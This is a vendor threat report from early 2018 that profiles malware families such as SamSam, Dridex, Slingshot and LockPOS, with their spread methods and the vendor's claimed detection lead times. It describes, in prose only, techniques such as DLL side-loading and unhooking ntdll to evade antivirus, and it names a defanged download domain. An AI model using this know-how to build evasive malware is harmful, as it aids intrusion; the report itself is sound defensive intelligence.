bluvector threat report€¦ · threat report q1 2018 bluvector runs all discovered malware samples...

While 2018 began with the massive revelation of Meltdown and Spectre, news about any malware threats that specifically target these CPU vulnerabilities has not yet been reported or confirmed. However, the first quarter has shown that while malware prevention solutions are improving for known threats, adversaries continue to evolve their craft to create attacks that circumvent these solutions. As the financial reward for attackers increases, we expect money to remain the primary driving force throughout the year. Which leads directly into Threat Report’s new category…

BluVectorThreat ReportQ1 2018

TABLE OF CONTENTS

3 Threat Report Q1 2018 Threat Chart

4 Summary

5 APT: HackingTeam

6 APT: OceanLotus

7 APT: PZChao

8 APT: Slingshot

9 TROJAN: AndroRAT

10 TROJAN: Dridex

11 TROJAN: GhostTeam

APTs Q1 2018

TROJANS Q1 2018

12 TROJAN: LockPOS

13 TROJAN: OylmpicDestroyer

14 TROJAN: Snojan

16 RANSOMWARE: AVCrypt

17 RANSOMWARE: BitPaymer/FriedEx

18 RANSOMWARE: GlobeImposter & GandCrab

19 RANSOMWARE: SamSam

15 MINER: Smominru

21 TROJAN: ExpensiveWall & Hancitor

22 TROJAN: Iced Id

23 TROJAN: Marcher

24 TROJAN: Orcus Rat

RANSOMWARE Q1 2018

MINERS Q1 2018

25 TROJAN: Scarab

26 RANSOMWARE: Bad Rabbit

27 RANSOMWARE: DoubleLocker Android

TROJANS Q4 2017

RANSOMWARE Q4 2017

NOTABLE Q4 2017 THREATS

10 MONTHS

11 Months in advance

Orcus Rat

TROJANS

APTs

RANSOMWARE


BitPaymer/FriedEx


OceanLotus


Slingshot21 Months in advance

HackingTeam

20 MONTHS

30 MONTHS

40 MONTHS


GlobeImposter


Double Locker


Scarab


IcedID


Hancitor


Dridex


Expensive Wall

THREAT FIRST PUBLICLY

IDENTIFIED


Bad Rabbit


Marcher

Threat ReportQ1 2018

BluVector runs all discovered malware samples through historical classifiers to identify when our machine learning engine would have first detected the named threat. BluVector currently supports over 35 file-specific machine learning classifiers.

7 Months in advance

AndroRat


SamSam

5 Months in advance

AVCrypt


GandCrab

50MONTHS


Snojan


OlympicDestroyer


PZChao

9 Months in advance

GhostTeam


LockPOS


SmominruMINERS

3© 2018 BluVector, Inc.

SUMMARY

Mining for Malware

As predicted, Q1 2018 saw the continued rise in prominence of crypto-mining, as the topic of cryptocurrencies remains the focus of the media and the general public. Huge financial incentives and a lack of regulation continue to draw the attention of attackers. Due to the volatility in the values of differing cryptocurrencies, miners have moved away from Bitcoin toward Monero.

However, crypto-mining is far from the greatest threat facing organizations, as reflected by the fact that only one Threat Report blog in Q1 dealt with miner malware, and it was only the use of the EternalBlue exploit that made the Smominru miner noteworthy. We have added a Miner category to our Threat Report chart as we expect that there will be further miner threats in the coming year.

Ransomware Hit List

As stated in one of our Q1 Threat Report blogs, the death of ransomware in the face of the popularity of cryptominers has been greatly exaggerated. Ransomware continues to pose a significant threat to organizations, with victims facing both high monetary and reputational costs as the result of a successful attack. There were several high-profile attacks during Q1 which amply demonstrate these impacts.

The threat ransomware continues to pose is demonstrated by ransomware accounting for over 30% of Threat Report blogs in Q1. In February, SamSam ransomware infected 2,000 Colorado Department of Transport (CDOT) systems. A week later, once CDOT had 20% of systems back online, another SamSam variant reinfected those systems, resulting in the staff’s return to pen and paper. Six weeks after the initial infection, CDOT reported it had only returned to 80% of its pre-infection functionality. It stated that recovery costs may reach US$1.5 million, which includes the cost of temporarily expanding its core IT team from 25 to 150 “during the peak of the incident.” The City

of Atlanta was also hit by a highly publicized SamSam ransomware attack in March, which was still not completely resolved a month later, costing $2.7 million to that point. The Baltimore 9-1-1 Computer Aided Dispatch system was also knocked offline for approximately 17 hours in late March by unnamed ransomware.

APTs and Trojans: Still Kicking

The most damaging threat comes from the two categories that allow attackers to stealthily compromise a network and extract credentials and other data: trojans and their stealthier cousins, Advanced Persistent Threats (APTs). Cumulatively, they accounted for over 63% of Threat Reports in Q1. Trojans and APTs are highly likely to be responsible for – or a large component of – successful breaches. In January 2018, the Japanese-based cryptocurrency exchange Coincheck was breached, resulting in the theft of a colossal $534 million in the relatively unknown NEM coin cryptocurrency. In March, Under Armour announced that data was compromised from 150 million accounts related to its MyFitnessPal app.

Conclusion

To put the relentlessness of attacks and the attackers perpetrating them into perspective, it has been reported that the global cybercrime economy generates an annual profit of $1.5 trillion or roughly the same as Russia’s GDP. To use an old cybersecurity adage, attackers only need to succeed once to compromise your network, defenders need to succeed every time. These facts and the events of Q1 2018 reinforce the reality that threat actors have no intention of scaling back their attacks. It is important not to be distracted by coverage given to one attack vector or class of attack – distraction has been a powerful tool in the arsenals of attackers for centuries… just think about why malware trojans are so named.


APT:HackingTeam

What Is It?

HackingTeam is an Italian-based purveyor of spyware which became notorious for selling its main surveillance tool, Remote Control System (RCS), to nation states with a dubious record of human rights issues, as well as various intelligence and law enforcement agencies. In July 2015, HackingTeam itself was hacked, resulting in the release of over 400GB of internal data, including emails, customer lists and RCS’s source code. The hackers also gained access to the official HackingTeam Twitter account, which they used to publicly announce the hack and provide links to the data. The data revealed that HackingTeam’s employees used poor passwords including “P4ssword”.

In the wake of the data breach, HackingTeam was forced to request its customers discontinue using the RCS product, which cast doubt on the continuing viability of the company. Research done by Slovakia-based security company ESET describes samples of RCS that were created between September 2015 and October 2017 and run on Microsoft Windows. Similarities in coding style and other factors, which they have chosen not to make public, led ESET to be “fully convinced” that these new variants are from HackingTeam and not created by other actors utilizing the previously released source code.

The samples make use of VMProtect, which describes itself as “software protection against reversing and cracking.” ESET found no major advances in functionality when compared to earlier variants, which include capabilities for extracting files, intercepting emails and instant messages and covertly activating webcams and microphones. In at least two cases, they found the samples attached to emails where the filename utilized multiple file extensions in order to attempt

to spoof an executable file as a PDF.

So far these new variants have been detected in 14 unnamed countries. There is no valid reason for these samples to be present on a corporate network, and their presence may indicate industrial espionage or other compromise.

How Does It Propagate?

The malware does not self-propagate. It has been observed attached to spear phishing emails as an executable file, attempting to appear as a PDF file. This again highlights the importance of user education and awareness programs as a component of overall security protections.

When/How Did BluVector Detect It?

Nine samples are publicly available and BluVector’s patented Machine Learning Engine (MLE) detected all of them. Regression testing has shown all samples would have been detected by all previous MLE models. Owing to differing times the samples have been available in the wild, they would have been detected between 21 and 50 months prior to their release.


APT:OceanLotus

What Is It?

Since 2014, the OceanLotus Advanced Persistent Threat (APT) group, also referred to as APT32 and APT-C-00, has been targeting governments and corporations in various industries located in Southeast Asia, especially Vietnam, Laos, Cambodia and the Philippines. The group is believed to be Vietnamese.

The group’s goal is to install a backdoor allowing for full access to a system and the data it contains. Recently, Slovakian-based security company ESET described the latest malware from OceanLotus. Though previously OceanLotus has utilized backdoor malware running on Macs, these samples run on Microsoft Windows.

OceanLotus utilizes two main attack vectors in order to install the backdoor. The first is the tried and true method of spear phishing emails containing malicious attachments. These attachments are executables but use icons of Microsoft Word and Excel documents in order to convince targeted users to execute them. Once executed, they display a password protected document to distract the user while the backdoor installs itself.

The second vector is the use of watering hole attacks in order to get targeted users to install fake installers or updaters for common software, such as Firefox. A watering hole attack is where threat actors compromise legitimate websites they either know or strongly suspect targeted users will visit.

Once executed, the malware creates a Windows service and deletes the document used as a distraction. The malware then drops a legitimate, digitally-signed DLL (Dynamic Link Library) file from a well-known application and uses it to load the code from a second, malicious dropped DLL

file. This well-established malicious technique is known as DLL side-loading. It works by placing the malicious DLL file in the same directory as the legitimate, signed DLL and then having the legitimate DLL load the malicious DLL into memory. This appears less suspicious as the loading is performed by a signed, trusted application.

The backdoor then encrypts its Command and Control (C2) traffic. However, if detected and captured, this traffic can be decrypted, owing to the fact the encryption key is actually part of the traffic.


The malware does not self-propagate. It is believed to be attached to spearphishing emails as an executable file, using the icon of a Microsoft Word or Excel document or convincing users to download and execute what they believe to be the installer or updater for common software such as Firefox. Again, this highlights the importance of user education and awareness programs as a component of overall security protections.


Six samples are publicly available and BluVector’s patented Machine Learning Engine detected all of them. Regression testing has shown four samples would have been detected 41 months prior to their release, with the two remaining samples being detected 26 and 10 months prior.


APT:PZChao

What Is It?

Recently, researchers at Bitdefender have released the results of their analysis of a sophisticated piece of custom written malware. They have named this malware PZChao, based on the domains it uses for its infrastructure. Each domain is used for a specific purpose, such as downloading or controlling malware components.

The attackers have targeted government sector, education and technology/telecommunications organizations in the U.S., Canada, Australia and throughout Asia since July 2017.

It has been observed that once compromised, three payloads are installed on an infected system. The first is a bitcoin miner. Secondly, both the 32-bit and 64-bit versions of the Mimikatz tool are installed, uploading harvested passwords to a command and control (C2) server later. Finally, a close variant of the Gh0st RAT remote access trojan (RAT) is installed. The RAT component effectively gives the attackers full control over an infected machine including keystroke logging, eavesdropping utilizing the webcam or microphone, full access to the file system and remote shell.

When analyzed, the RAT samples were found to be very similar to those used by the Iron Tiger Advanced Persistent Threat group. Believed to have been active since 2010, the group is thought to be based in China and previously considered to have initiated successful attacks on U.S. contractors, resulting in significant theft of data.


As is common with APTs, PZChao attacks begin with highly targeted spam emails containing a malicious Visual Basic Script (VBS) attachment, which then downloads further malicious components.


BluVector’s patented Machine Learning Engine detects PZChao components as malicious. Regression testing on various samples has shown they would have been detected by BluVector between 19 and 25 months prior to their release, with one sample detected 45 months prior.


APT:Slingshot

What Is It?

While working on a malware incident in February 2018, controversial Russian anti-virus firm Kaspersky Labs discovered a sophisticated piece of malware, which led them to identify additional samples that are the very definition of an Advanced Persistent Threat.

The APT malware, named Slingshot based on strings found in the code, uses a unique and highly-targeted attack vector in order to compromise systems belonging to highly privileged users. An indication of the sophistication and success of this APT is that it has remained undetected in the wild for a period believed to be at least 6 years.

Kaspersky observed nearly one hundred infections in Kenya, Yemen, Libya, Afghanistan, Iraq, Tanzania, Jordan, Mauritius, Somalia, Congo, Turkey, Sudan and the United Arab Emirates, with the majority in Kenya and Yemen. Based on text found within the code, Kaspersky believes that the creators are native English speakers, though this is often difficult to ascertain. They also believe the APTs overall sophistication points in the direction of nation state actors.

The malware is installed into routers specifically made by a Latvian company named Mikrotik. It isn’t currently known how the malware is initially placed on the router, however it could be due to an unknown (zero-day) vulnerability in the router’s firmware or potentially the use of default credentials.

When a system or network administrator responsible for administering the router logs into it, they become infected. In this way, the malware infects an attacker’s ideal user, one with access to numerous key systems and infrastructure within a corporate environment. Once installed on an administrator’s system, the APT downloads

additional malware capable of taking screenshots, logging keystrokes, acquiring network data and capturing passwords, the contents of USB devices and clipboard contents. However, as the malware has full access to the kernel (also known as ring-0), which is extremely difficult to achieve without causing the dreaded “blue screen of death,” Slingshot could potentially access other sensitive data such as stored password hashes and credit card details.

As demonstrated by the amount of time this APT has gone unnoticed, the malware uses sophisticated techniques to remain undetected, including shutting down its components when it detects tools or techniques suggesting forensic or malware analysis. Similar to previous APTs, Slingshot utilizes its own custom, encrypted filesystem located in unused space on the hard drive.


The initial infection vector is not currently known, though it is not believed the malware self-propagates.

The malware infects the systems of administrators logging into infected Mikrotik routers.


Not all samples referenced in the report are currently publically available, however, four samples were retrieved and BluVector’s patented Machine Learning Engine detected all of them. Though the samples have only just become available after being discovered in February 2018, they are believed to have been hidden in the wild for at least 6 years, predating public release of BluVector. However, regression testing on the four samples has shown they would have been detected up to 34 months ago.


TROJAN:AndroRAT

What Is It?

Researchers recently released analysis of a new variant of AndroRAT, a remote access trojan for Android devices.

Of note, this variant exploits the CVE-2015-1805 vulnerability in order to gain root access to the device to allow it to perform privileged actions. This vulnerability was patched by Google in March 2016, however, devices running older versions of Android, which no longer receive patches, leave a large number of users potentially exposed. This user base could include those making use of a corporate bring your own device (BYOD) program which could provide attackers with sensitive information or other information that could be used to socially engineer an infected user or other employee.

This AndroRAT variant’s capabilities include key logging, recording audio and calls, taking photos and stealing various data, including WiFi passwords, call logs, GPS location, contacts, files, SMS messages, calendar events, screenshots and web browsing history. It can also be used to upload files to the device.


AndroRAT does not self-propagate.

The malware is contained in a malicious app on third party app stores, and users are enticed to download it based on its apparent usefulness. Google has confirmed this app was never present in the official Google Play store and that detection for CVE-2015-1805 was already part of their compatibility tests. This reinforces the dangers posed to users by third party app stores.


BluVector’s patented Machine Learning Engine detects this malware. Regression testing on three samples has shown the malware would have been detected by BluVector 30, 27 and 7 months prior to its release. Note: BluVector would only detect the malware if the mobile device was connected to a corporate network monitored by a BluVector appliance.


TROJAN:Dridex

What Is It?

Researchers recently discovered a malicious spam run spreading a new variant of the Dridex banking trojan. Dridex was first seen in late 2014 and continues to be very successful at stealing online banking credentials.

In an uncommon move, the links in the spam emails, which result in the downloading of malicious Microsoft Office documents, are FTP sites. It is far more common for these links to point to web pages. The FTP links in the emails contain the compromised credentials for accessing the FTP site.

The use of FTP links may be due to the attackers attempting to bypass email security products/policies. However, it highlights the importance of keeping FTP server software up-to-date and ensuring policies are in place to change all FTP passwords on a regular basis, as this limits the time-to-live for any misuse of compromised credentials.


The Dridex trojan does not self-propagate.

As has been the case since it was first released, Dridex relies on a malicious spam email and a malicious Microsoft Office document in order for the actual trojan to be downloaded and installed on a user’s system. Both of these steps require the user to be socially engineered into performing an action for them to be successful, e.g., clicking a link or allowing a macro to run. Dridex actors continue to use this approach as it continues to work. This again illustrates the importance of user education as a component of your overall cyber defense strategy.


BluVector’s patented machine learning malware detection engine detected the Dridex trojan as malicious. Regression testing on samples has shown the Dridex trojan itself would have been detected by BluVector 32 months prior to its release and the malicious document files would have been detected 13 months prior.


TROJAN:GhostTeam

What Is It?

A recent blog entry from Trend Micro describes malware they found in a total of 53 apps on the Google Play Store. The malware, named GhostTeam based on the presence of this string in early versions of the malware code, is primarily Adware, however, it also targets Facebook credentials, uploading them to a command and control (C2) server in the .com.vn domain.

The malware will only fully install after it confirms it is running on an actual Android device and not an emulator or a virtual machine.

The infected apps claim to be useful utility apps, such as a flashlight, device performance improvement apps and social media video downloader apps, which are particularly appealing to users in areas where mobile internet speeds are relatively low.

These apps are also illustrative of the risks associated with Adware and other potentially unwanted programs/applications. These categories can sometimes be considered essentially safe by administrators, however, as evidenced here, Adware is often more than merely annoying and can contain malicious elements or can download other malicious content.


The infected apps do not self-propagate.

The malware is contained in various apps on the Google Play Store and users are enticed to download them based on their apparent usefulness.


BluVector’s patented machine learning malware detection engine detects the GhostTeam -infected apps as malicious. Regression testing on several infected samples has shown the files would have been detected by BluVector an average of 9 months prior to their release. Note: BluVector would only detect the malware if the mobile device was connected to a corporate network monitored by a BluVector appliance.


TROJAN:LockPOS

What Is It?

Recently, researchers have discovered a new and sophisticated variant of the LockPOS point-of-sale (POS) malware. The purpose of this malware is to extract payment card data from the memory of an infected point-of-sale system and send that data back to the attackers.

The most concerning aspect of LockPOS is that it improves upon a method that an earlier POS malware, Flokibot, used to avoid detection by endpoint anti-virus products. Aside from multiple stages of unpacking and decrypting itself, LockPOS first obtains a copy of a core Windows file (ntdll.dll) by mapping it from the system’s disk. This process ensures the malware is calling a “clean copy” of the file, therefore bypassing hooks used by anti-virus products to monitor system activity. LockPOS then injects the malicious payload into the kernel, again bypassing anti-virus products.

Researchers note that this malware required significant resources and technical skill to develop. This reflects the potential high monetary returns from a successful POS breach. POS malware is a great concern for any business, as the reputational losses and potential settlement and regulatory costs stemming from a major POS breach can have a large impact, as we have seen in several breaches including Target and Home Depot.


The LockPOS malware does not self-propagate.

The malware is being spread by the same botnet that previously delivered the Flokibot POS malware, which could be any device on the corporate network that has visibility in to the POS devices.


BluVector’s patented machine learning malware detection engine detects the LockPOS malware as malicious. Regression testing on the sample has shown the file would have been detected by BluVector 48 months prior to its release.


TROJAN:OlympicDestroyer

What Is It?

Following the opening ceremony of the PyeongChang Winter Olympics there were reports of a cyberattack targeting systems associated with the games, including the official website. A spokesperson for PyeongChang 2018 later confirmed this. Along with the International Olympic Committee, they had decided not to name the source, though there were two obvious candidates.

Researchers at Cisco TALOS believe with “moderate confidence” that they have identified and analyzed the malware samples responsible for this attack. The malware is destructive in nature and includes components to steal credentials to allow it to spread laterally through a network. TALOS found similarities in the lateral movement and destructive parts of the code with BadRabbit and NotPetya malware.

Though the initial infection vector is currently unknown, the first piece of malware drops several other malicious files and handles propagation. Other components include a browser credential stealer, a system credential stealer (similar to Mimikatz) and a destructive component.

The destructive component deletes the shadow copies and the WBAdmin backups, clears the system and security event logs, disables all the services on the system and overwrites all writable files on all shared drives attached to the infected system.


The initial infection vector in this attack is currently not publicly known.

The malware uses the legitimate PSExec utility and Windows Management Instrumentation (WMI) to move laterally. This is the same mechanism employed by both BadRabbit and NotPetya malware.

The malware also includes 44 sets of hard coded credentials for systems within the Pyeongchang2018.com domain, which are also used for lateral movement. The passwords, though redacted in the TALOS article, are very poor and would have been easily guessed or brute-forced, presumably during prior reconnaissance by the attackers.


BluVector’s patented Machine Learning Engine detects the malware utilized by this attack. Regression testing on samples has shown the malware would have been detected by BluVector 14 months prior to its release.


TROJAN:Snojan

What Is It?

As is inevitable at this time of year, there have been recent reports of large scale malicious spam campaigns based around tax-related lures. One such campaign has been reported to involve tens of millions of malicious emails, containing an attachment named taxletter.doc.

The attackers have been observed regularly altering the text of the emails in an attempt to avoid detection by spam filters and other security products. However, the email subject and body text generally claims to be advising the recipient of an issue with their tax return or informing them of an unexpected tax windfall. The object of course is to get the recipient to open the attached malicious Word document and override their default warnings to allow the embedded macro to run.

In this case, once allowed to run by the user, the macro issues a Powershell command to download and execute a file from the bigrussiandomains[.]win site. The downloaded file, tax.exe, is then saved to the user’s Temporary directory as mixak.exe and executed.

The tax.exe malware is a password stealer, targeting, among others, passwords stored in browsers. Though convenient, storing of passwords in browsers makes it easier for attackers to obtain passwords such as banking and other financial credentials, social media credentials and credentials used for internal systems on the corporate network. These credentials can easily be monetized by attackers either using them to perform financial fraud directly or selling them. Internal credentials greatly assist attackers with reconnaissance and lateral movement within a corporate network.

Once again, these attacks rely on socially engineering users to not only open an attachment but then allow macros to run. The reason these attacks continue to use this vector is that it continues to work in sufficient numbers to make it unnecessary for less skilled attackers to invest time and effort into using more sophisticated attacks.


None of the malware discussed here self-propagates.

Once again these attacks utilize social engineering to be successful. Particularly at this time of year, it is important for users to be vigilant and aware of the likelihood of malicious emails using tax-related lures.


BluVector’s patented Machine Learning Engine detects this malware. Regression testing on two malicious Word document samples has shown they would have been detected by BluVector 48 months prior to their release. The password stealer malware sample would have been detected 14 months prior to its release.


MINER:Smominru

What Is It?

Recently, several articles have described how the massive increase in value of various cryptocurrencies has seen attackers switching focus from ransomware to cryptocurrency mining as it becomes the most lucrative form of malware.

The rise in miner malware is such that SANS Internet Storm Center handler Kevin Liston opined that he should add an infrared camera to his incident response toolkit, given that a computer infected with a miner would be using all available computing power and therefore be running hotter than other computers in the same office.

One such miner is Smominru, recently analyzed by Proofpoint researchers, which targets the Monero cryptocurrency. They state the attackers have already mined approximately 8,900 Monero which, due to the volatility of cryptocurrency valuations, equates to somewhere between $2.8 and $3.6 million, and they are currently mining Monero worth around $8,500 every day.

The Smominru miner spreads to vulnerable Microsoft Windows systems by utilizing the leaked NSA EternalBlue exploit (CVE-2017-0144), even though Microsoft released a patch for this in March 2017 (MS17-010).


As mentioned, the Smominru miner uses the EternalBlue exploit to spread. This highlights the need to have a robust patching policy and ensure that internet-facing systems have all unnecessary services turned off, in this case Windows network file sharing.


BluVector’s patented Machine Learning Engine (MLE) detects Smominru as malicious. Regression testing on samples of four different versions of Smominru has shown they would have been detected by BluVector 32, 49 and 50 months prior to their release.


RANSOMWARE:AVCrypt

What Is It?

Attribution of malicious code, that is, attempting to identify which group, individual or nation state is behind a given sample, is a controversial and often divisive issue. This is due to the fact that attribution is very difficult to prove conclusively, and it is relatively easy for a threat actor to obfuscate the true author. Sometimes the issue at hand is simply, what is the primary purpose of a piece of malware?

Such is the case with a piece of malware recently described by BleepingComputer. The malware, which they have named AVCrypt based on the file name of av2018.exe, exhibits some behaviors consistent with a potentially incomplete piece of ransomware and some related to destructive wiper malware.

The AVCrypt malware attempts to specifically uninstall and remove both Windows Defender and Malwarebytes by issuing commands to stop and delete the relevant Windows Services. There have been reports that AVCrypt queries Windows Security Center and tries to remove the registered anti-virus product. The keyword here is “tries” as AVCrypt issues a WMIC (Windows Management Instrumentation Command-line) command to attempt to uninstall the product. This is highly unlikely to be successful with the vast majority of AV products, which contain countermeasures against unauthorized removal.

Lending credence to the hypothesis that AVCrypt is a sample of in-development ransomware is the fact that when it encrypts files and creates the +HOW_TO_UNLOCK.txt file, this file only contains the string “lol n.” Additionally, the sample contains numerous uses of the Windows API call OutputDebugString. Also, when AVCrypt uses its included TOR client to send the encryption key to a hardcoded command and control server address, it appears to append invalid data to the key. The sample itself and the

strings within it are not packed or obfuscated in any way, as is commonplace with most malware in the wild.

The sample also makes a number of changes to the Windows registry aimed at reducing the overall security posture of the system. Once it has completed encrypting files, it then deletes the TOR client files it dropped, clears the Windows event logs and terminates its own process. These steps are in addition to a number of Windows Services it attempts to delete at startup. Taken together, these actions could be considered quite destructive – if successful.

On balance, the above would suggest this malware is ransomware in development. However, the original BleepingComputer article has a very interesting comment added by user “hitler67”. The author of the comment, which appears not to be written by a native English speaker, states he is the author of the sample, which was intended to be used for a presentation at an unnamed security conference, and he is unaware how the sample became public. He also states he is concerned the sample and the analysis in the article could be used by “bad actors.”


The malware does not contain the necessary code to self-propagate.

The most common attack vector for most ransomware is social engineering, either as malicious attachments or downloads performed by malicious documents.


Two samples are publicly available and BluVector’s patented Machine Learning Engine detected both. Regression testing has shown both samples would have been detected 5 months prior to their release.


RANSOMWARE:BitPaymer/FriedEx

What Is It?

Researchers at legacy anti-virus vendor ESET have published findings that show strong evidence that the authors of the Dridex banking trojan are also responsible for writing the code for the BitPaymer ransomware. Owing to the connections they found with Dridex, ESET refers to this malware as FriedEx.

The Dridex banking trojan has been seen in the wild since 2014 and since its initial release has been significantly updated and improved, becoming one of the most sophisticated and successful banking trojans.

The BitPaymer/FriedEx ransomware was first seen in July 2017 and received significant media coverage when it was responsible for infecting several National Health Service hospitals in Scotland during August 2017. Much like the recently discussed SamSam ransomware, BitPaymer/FriedEx tends to target higher-profile companies and entities, rather than home users, and usually uses brute force Remote Desktop attacks to initially infect systems.

Researchers showed screenshots that appear to come from the Hex-Rays decompiler tool, showing almost identical code in key areas of Dridex and BitPaymer/FriedEx functions. There were also commonalities in the compiler information and compiler timestamps. Their findings make a strong case for the same authors being behind both families of malware. It appears the authors saw an opportunity to take their existing Dridex codebase and modify it as necessary to create a ransomware revenue stream for themselves.


Similar to the SamSam ransomware, BitPaymer/FriedEx spreads by attackers manually brute forcing Remote Desktop Protocol (RDP) servers, which then gives them access to devices within the networks. Again, best practice dictates that RDP servers should not be accessible from the internet.


BluVector’s patented machine learning malware detection engine detects the BitPaymer/FriedEx ransomware as malicious. Regression testing on samples has shown the ransomware would have been detected by BluVector 29 months prior to its release.


RANSOMWARE:GlobeImposter & GandCrab

What Is It?

With all the focus cryptocurrency mining is currently receiving, both from the press and attackers looking for a more lucrative revenue stream, it is prudent not to underestimate the threat that ransomware still poses.

Take the case of the Colorado Department of Transport (DOT). On February 21, 2018, the staff discovered that all employee machines running Windows were infected with what was later determined to be SamSam ransomware. This forced Colorado DOT to take over 2,000 machines offline, literally sending employees back to pen and paper for their work activities.

While the DOT had backups of the encrypted data, restoring the data is a time-consuming process. So much so that it had to work out how to pay employees without fully restored systems. By March 1, approximately 20% of machines were back online, consisting mainly of HR and payroll machines that were given recovery priority. They were promptly taken back offline after another variant of SamSam infected these systems.

A SANS Internet Storm Center (ISC) Diary post by handler Brad Duncan described a large malicious spam campaign resulting in ransomware infection. He found this of note, as it was one of the few major ransomware malicious spam campaigns he had seen so far in 2018. The majority of campaigns related to cryptocurrency mining and trojans. The specifics of this campaign aren’t particularly novel: an attached Word document contained a malicious macro. If the recipient is successfully socially engineered to allow the macro to run, it results in a Powershell script that retrieves and executes the ransomware from an external

site. All of the attachments were named “Resume.doc” (with a space as the first character), however, each sample had a unique file hash. The attackers also varied the email’s from address, email subject, email headers and email body text in an attempt to avoid detection. The resulting ransomware were determined to be variants of GlobeImposter and GandCrab.

Ransomware may not currently be the cause du jour of IT Security, however, as these two examples demonstrate, this does not mean that the threat ransomware poses to corporate environments has diminished.


None of the malware discussed here self-propagates.

Once again, these attacks utilize social engineering to be successful on an infected end user’s machine.


BluVector’s patented Machine Learning Engine detects both the malicious Word documents and ransomware described in the ISC article. Regression testing on the 23 malicious Word document samples showed that they would have all been detected by BluVector 49 months prior to their release. One of the three samples of ransomware would have been detected 15 months prior to its release, with the other two detected 51 months prior.

So far, no specifics on the SamSam variants that infected Colorado DOT machines are available, therefore they cannot be tested against BluVector. However, previous testing on other SamSam variants has shown strong detection results, with an average detection of 12 months prior to their release into the wild.


RANSOMWARE:SamSam

What Is It?

Researchers from Cisco TALOS recently released details of a new variant of the SamSam ransomware, which has affected organizations in several industry verticals, including government, healthcare and ICS.

Media reports have advised various healthcare organizations have been affected in recent days, including MedStar, a non-profit group that manages 10 hospitals in the Baltimore and Washington, DC area, Chicago-based AllScripts and Hancock Health Hospital, as well as Adams Memorial Hospital in Indiana. The government municipality of Farmington, New Mexico has also been impacted.

The initial infection vector has not yet been determined, though it is believed to be consistent with previous SamSam variants, where the attackers manually install the ransomware after compromising the corporate network and moving laterally to identify which business critical servers would make the best targets.

The ransomware consists of two components, a loader and an encrypted payload, both delivered as .NET executables. By design, the attackers must manually activate the ransomware using a randomly generated encryption key. SamSam is not a mass market ransomware such as WannaCry, but it is designed to be deployed on high-value targets.

Researchers have determined at least one Bitcoin wallet is being used to collect ransom payments. Currently this wallet has collected 30.4 Bitcoin, which at the time of writing is worth approximately US$270K.


Unlike many other strains of ransomware, SamSam does not self-propagate.

Researchers have not yet determined with certainty the initial infection vector which then allowed the attackers to install the SamSam ransomware. However, they believe it may be compromised RDP and VNC servers that gave the attackers their first foothold into entering corporate networks. This is another reminder that a determined attacker will find any weakness in your perimeter defense. Best practice dictates that RDP and VNC servers should not be accessible from the internet.


BluVector’s patented machine learning malware detection engine detects SamSam ransomware as malicious. Regression testing on several samples has shown they would have been detected by BluVector an average of 12 months prior to their release.


Notable Q42017 Threats

TROJAN:ExpensiveWall

What Is It?

Another strain of Android malware, dubbed ExpensiveWall, was discovered in over 50 apps on the Google Play Store. These infected apps were down-loaded at least 1 million times and possibly as high as 4.4 million times with the potential for up to 21.1 million infections.

The malware makes use of packing, a common technique in Windows malware which encrypts the malicious code, in order to defeat Google Play Store’s own malware detection.

Once installed and granted the requested privileges, it silently registers the infected users for premium services and sends premium SMS messages, charging their accounts.


More than 50 apps in the Google Play Store were infected with Expensive-Wall malware. While Google Play Store quickly removed the apps from availability, Android users with those apps may still risk infection.


A number of Android apps infected with ExpensiveWall were tested and all were identified as malicious by BluVector’s machine learning malware detection engine. Regression testing has shown this trojan would have been detected by BluVector since November 2016. Note: BluVector would only detect the malware if the mobile device was connected to a corporate net-work monitored by a BluVector appliance.

What Is It?

The Hancitor botnet has previously targeted corporations in the tech, bio-tech and infrastructure industry verticals.

In this case, a malicious spam email claiming to be an invoice from Ad-vanced Maintenance contains links which, if clicked, result in the download of a Word document containing malicious macros. If the end-user allows these macros to run, a malicious executable is extracted and executed.

This malicious executable is capable of downloading other malware, includ-ing ransomware and data-stealing malware.


The malware is spread using a spam campaign which needs to convince the user to click on a link in order to download the malicious Word document, open the document and allow macros to execute. As always, end-user edu-cation is a critical component of securing a corporate environment.


Both the malicious Word document and the extracted executable are identified as malicious by BluVector’s machine learning malware detection engine. Regression testing has shown the Word document would have been detected by BluVector 43 months in advance and the executable 35 months in advance.

TROJAN:Hancitor


What Is It?

Recently security researchers released the results of their research into a new banking trojan dubbed IcedID, first seen in the wild in September 2017.

The current versions of IcedID are able to target banks, payment card and mobile service providers, payroll portals, as well as webmail and e-commerce sites.

In order to steal financial data and user credentials, the malware performs both redirection attacks – where it creates a local proxy in order to silently redirect users to fake, cloned versions of their legitimate financial provider’s websites – and web injection attacks – where it adds extra fields into legitimate webpages in order to obtain additional user data. Previously, only the Dridex banking trojan utilized both techniques; generally one or the other is used.

The research found that the IcedID trojan does not appear to reuse code from other banking trojans, indicating the attackers are potentially a new group.

TROJAN:IcedID


The IcedID malware has been found to have been downloaded and installed on systems as a secondary infection, by the Emotet trojan. This allows the attackers to only install IcedID on systems located in the US, Canada and the UK, and recov-ered configuration files show financial institutions in these countries are the ones currently being targeted.

This malware also has the ability to propagate via the internal network, and re-searchers have also observed it infecting a terminal server.


BluVector’s patented machine learning engine detects the IcedID malware as ma-licious. Regression testing on four samples has shown the files would have been detected by BluVector between 36 and 46 months prior to their release.


TROJAN:Marcher

What Is It?

The Marcher malware is part of a three-way attack aimed at customers of Austrian banks.

The first component of this attack is a phishing email containing a link, utilizing the bit.ly URL redirection service. The link takes the user to a phishing site that duplicates a bank’s legitimate online banking login page in an attempt to steal the user’s credentials. After the user enters his or her credentials, the fake site then also requests the user’s email address and phone number.

At this point, the second phase of the attack begins. The user is presented with a webpage advising that he or she does not have the bank’s required “Security App” and providing another bit.ly link and a QR code in order to download the app. There are even instructions on ac-cepting the Android system permissions requested by the app. The app is, of course, a variant of the Marcher banking trojan.

The third aspect of the attack is that, in addition to stealing the user’s online banking credentials, the Marcher trojan will also request credit card information be entered when certain apps are opened, such as the Google Play Store. The trojan also attempts to obtain other supporting information, such as the user’s date of birth, address, billing phone number and password by presenting fake Verified by Visa and MasterCard SecureCode screens.


Previous variants of Marcher malware have been distributed via text messages. In this case, propagation occurs by successfully socially engineering a user to install the malware, believing it to be an app required by his or her bank. This will only occur if the user has previously been socially engineered to click on the link in a phishing email and enter his or her credentials into a fake online banking site.

Attackers continue to use social engineering to exploit the most vulnerable component of any computer system: the user. They do so because this attack vector is reliably successful. User education is a critical part of securing any corporate network. With Android devices becoming more commonplace in enterprise networks due to BYOD policies, they can create a new threat vector for malware infections if not monitored and managed correctly.


